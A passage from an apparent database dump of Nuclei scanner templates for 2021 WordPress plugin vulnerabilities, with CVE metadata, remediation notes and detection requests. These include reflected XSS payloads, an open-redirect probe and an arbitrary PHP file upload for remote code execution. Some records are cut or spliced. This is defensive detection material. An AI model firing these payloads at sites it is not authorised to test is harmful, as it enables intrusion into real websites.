Logger\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100da1d2590e32aeae01e9bde72dd44c3ec2cb17e57cc94120918a61f0ef4bc138a0220221f43062ec121f78c5630d30a32390327483712c7f64e0d182dec57735cbc88:922c64590222798bb761d5b6d8e72950", "hash": "a362fc44d38dfcac09412012ea3242f6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308298" }, "name": "CVE-2021-24210.yaml", "content": "id: CVE-2021-24210\n\ninfo:\n name: WordPress PhastPress <1.111 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities.\n remediation: |\n Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb\n - https://plugins.trac.wordpress.org/changeset/2497610/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24210\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24210\n cwe-id: CWE-601\n epss-score: 0.00129\n epss-percentile: 0.47553\n cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: kiboit\n product: phastpress\n framework: wordpress\n tags: cve2021,cve,redirect,wpscan,wordpress,kiboit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a00473045022019fc2da35b19a8aa2ac26fadb08217e95ab59fd07e05e055ea13dcbc91f66bd3022100d867bcef59606cc9f5b689b663c0f39d8bcabaa9e57ec2e1b5529182c1e85295:922c64590222798bb761d5b6d8e72950", "hash": "6a17b63f11a6ad2d68444e8c36027f92", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308299" }, "name": "CVE-2021-24214.yaml", "content": "id: CVE-2021-24214\n\ninfo:\n name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting\n author: tess\n severity: medium\n description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24214\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24214\n cwe-id: CWE-79\n epss-score: 0.00337\n epss-percentile: 0.7074\n cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: daggerhartlab\n product: openid_connect_generic_client\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'OpenID Connect Generic Client'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-login.php?login-error='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ERROR ():'\n - 'Login with OpenID Connect'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950", "hash": "78ee0fce6b71f5bd4d3c17fb3d83fd91", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829a" }, "name": "CVE-2021-24215.yaml", "content": "id: CVE-2021-24215\n\ninfo:\n name: Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation\n author: r3Y3r53\n severity: critical\n description: |\n An Improper Access Control vulnerability was discovered in the plugin. Uncontrolled access to the website customization functionality and global CMS settings, like /wp-admin/customization.php and /wp-admin/options.php, can lead to a complete compromise of the target resource.\n remediation: Fixed in version 1.5.2\n reference:\n - https://wpscan.com/vulnerability/eec0f29f-a985-4285-8eed-d1855d204a20\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24215\n - https://www.opencve.io/cve/CVE-2021-24215\n - https://m0ze.ru/vulnerability/[2021-03-18]-[WordPress]-[CWE-284]-Controlled-Admin-Access-WordPress-Plugin-v1.4.0.txt\n - https://m0ze.ru/vulnerability/%5B2021-03-18%5D-%5BWordPress%5D-%5BCWE-284%5D-Controlled-Admin-Access-WordPress-Plugin-v1.4.0.txt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24215\n cwe-id: CWE-425,CWE-284\n epss-score: 0.19113\n epss-percentile: 0.9615\n cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpruby\n product: controlled_admin_access\n framework: wordpress\n publicwww-query: /wp-content/plugins/controlled-admin-access/\n tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")'\n condition: and\n# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950", "hash": "79ada95082a3a39b591e5bcf644bc605", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829b" }, "name": "CVE-2021-24226.yaml", "content": "id: CVE-2021-24226\n\ninfo:\n name: AccessAlly <3.5.7 - Sensitive Information Leakage\n author: dhiyaneshDK\n severity: high\n description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \\\"resource/frontend/product/product-shortcode.php\\\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information.\n remediation: |\n Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24226\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24226\n cwe-id: CWE-200\n epss-score: 0.03058\n epss-percentile: 0.90773\n cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: accessally\n product: accessally\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,accessally\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '
    =2.0) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139\n - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24235\n - https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Goto-WordPress-Theme-v1.9.txt\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24235\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45944\n cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: boostifythemes\n product: goto\n framework: wordpress\n tags: cve2021,cve,xss,wp-theme,wpscan,wordpress,boostifythemes\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"input/Autofocus/%0D*/Onfocus=alert(123);\"\n - \"goto-tour-list-js-extra\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207172378464726e156cb63127750d8141c27c54fcca61e8ac543695934d8177cc0220120dd46612aca278b023793c297b93335bd16a9ce26edb7eaf12e9dd092e5052:922c64590222798bb761d5b6d8e72950", "hash": "a1bc38cee3667f338c2f6a42ae73cf2c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829e" }, "name": "CVE-2021-24236.yaml", "content": "id: \"CVE-2021-24236\"\n\ninfo:\n name: WordPress Imagements <=1.2.5 - Arbitrary File Upload\n author: pussycat0x\n severity: critical\n description: |\n WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.\n impact: |\n This vulnerability can lead to remote code execution and compromise the affected WordPress site.\n remediation: |\n Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea\n - https://wordpress.org/plugins/imagements/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24236\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: \"CVE-2021-24236\"\n cwe-id: CWE-434\n epss-score: 0.15028\n epss-percentile: 0.95292\n cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: imagements_project\n product: imagements\n framework: wordpress\n tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project\nvariables:\n php: \"{{to_lower('{{randstr}}')}}.php\"\n post: \"1\"\n\nhttp:\n - raw:\n - |\n POST /wp-comments-post.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"comment\"\n\n {{randstr}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"author\"\n\n {{randstr}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"email\"\n\n {{randstr}}@email.com\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"url\"\n\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"checkbox\"\n\n\n yes\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"naam\"\n\n {{randstr}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\n Content-Type: image/jpeg\n\n \n\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"submit\"\n\n Post Comment\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"comment_post_ID\"\n\n {{post}}\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n Content-Disposition: form-data; name=\"comment_parent\"\n\n 0\n ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n - |\n GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n part: body_2\n words:\n - \"CVE-2021-24236\"\n# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950", "hash": "84ff748cdbce89e4d860e56ab5e41c76", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30829f" }, "name": "CVE-2021-24237.yaml", "content": "id: CVE-2021-24237\n\ninfo:\n name: WordPress Realteo <=1.2.3 - Cross-Site Scripting\n author: 0x_Akoko\n severity: medium\n description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability.\n reference:\n - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e\n - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24237\n - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt\n - https://www.docs.purethemes.net/findeo/knowledge-base/changelog-findeo/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24237\n cwe-id: CWE-79\n epss-score: 0.00265\n epss-percentile: 0.65501\n cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: purethemes\n product: findeo\n framework: wordpress\n tags: cve2021,cve,realteo,xss,wordpress,plugin,wpscan,intrusive,purethemes\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - autofocus onfocus=alert(/{{randstr}}/);//\n - Nothing found\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204b9bcf654a4fdbd7dd7b23c12beaa5286360f594247e37850e45dce56acfa10f02210098b0b6add57f62bf6677700e736e62b4182e01c7236ca9127ab47e2746206de9:922c64590222798bb761d5b6d8e72950", "hash": "41fee0a5cd43a03da256348cd04d27c1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a0" }, "name": "CVE-2021-24239.yaml", "content": "id: CVE-2021-24239\n\ninfo:\n name: WordPress Pie Register <3.7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim.\n remediation: Fixed in version 3.7.0.1.\n reference:\n - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34\n - https://plugins.trac.wordpress.org/changeset/2507536/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24239\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24239\n cwe-id: CWE-79\n epss-score: 0.00129\n epss-percentile: 0.47461\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve2021,cve,xss,pie-register,wp,wpscan,genetechsolutions,wordpress\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Pie Register'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"\") && contains(body, \"invitaion-code-table\")'\n condition: and\n# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950", "hash": "55d07d4c7f102d288557368267c8167b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a1" }, "name": "CVE-2021-24245.yaml", "content": "id: CVE-2021-24245\n\ninfo:\n name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html\n - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24245\n - http://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24245\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: trumani\n product: stop_spammers\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,packetstorm,trumani\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Stop Spammers Spam Prevention'\n - 'Tags:'\n condition: and\n\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP+Cookie+check;\n\n log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"ad\\\" accesskey=X onclick=alert(1)\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205917ffa809c11d9c309949d353c16ced2a39b5fd1efa927f718b4e5c1d418c1a022100ec4e71ee4005aad1c859c0a7b7b336bae761807d52ac3733efd04804c3764719:922c64590222798bb761d5b6d8e72950", "hash": "daf355acfdbde74e5a3a02e97dbb3b8b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a2" }, "name": "CVE-2021-24274.yaml", "content": "id: CVE-2021-24274\n\ninfo:\n name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d\n - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24274\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24274\n cwe-id: CWE-79\n epss-score: 0.00201\n epss-percentile: 0.56972\n cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: ultimate_maps\n framework: wordpress\n tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,maps,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220132a7e45098649917c5b1ac8ddfd5f6b71d5af732a45f4ffb3ae88a1685501e0022100949f391c614e80a67397c2e5ffc049401d3fff718ff85c184a644d9052478095:922c64590222798bb761d5b6d8e72950", "hash": "ba2b739b81fbda9b62ba611875872d51", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a3" }, "name": "CVE-2021-24275.yaml", "content": "id: CVE-2021-24275\n\ninfo:\n name: Popup by Supsystic <1.10.5 - Cross-Site scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f\n - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24275\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24275\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: popup\n framework: wordpress\n tags: cve2021,cve,wpscan,packetstorm,wordpress,wp-plugin,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202e8b612008e7b0431de014a13bfb6d727ae9e6d71ea87d4d29754936012f118e022100bb024808d77aed7e62c623b62b8e653220673c8f814fb7575dfa7f7df1056248:922c64590222798bb761d5b6d8e72950", "hash": "7dfd76c10bc360eece76f9c60f45d2df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a4" }, "name": "CVE-2021-24276.yaml", "content": "id: CVE-2021-24276\n\ninfo:\n name: WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c\n - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24276\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24276\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60494\n cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: supsystic\n product: contact_form\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,packetstorm,supsystic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ccf19553c3785450c335d57b9e48236787603b65f193d92a7aa7845a9f18ea87022100bfc9570db36ebaebe97547ffa74f02f047c2ae49cca8f2653f2c9dbf1e5bab3c:922c64590222798bb761d5b6d8e72950", "hash": "ec47f851843d73ec3f06b43792878fa5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082a5" }, "name": "CVE-2021-24278.yaml", "content": "id: CVE-2021-24278\n\ninfo:\n name: WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation\n author: 2rs3c\n severity: high\n description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.\n impact: |\n Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access.\n remediation: |\n Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability.\n reference:\n - https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413\n - https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24278\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: 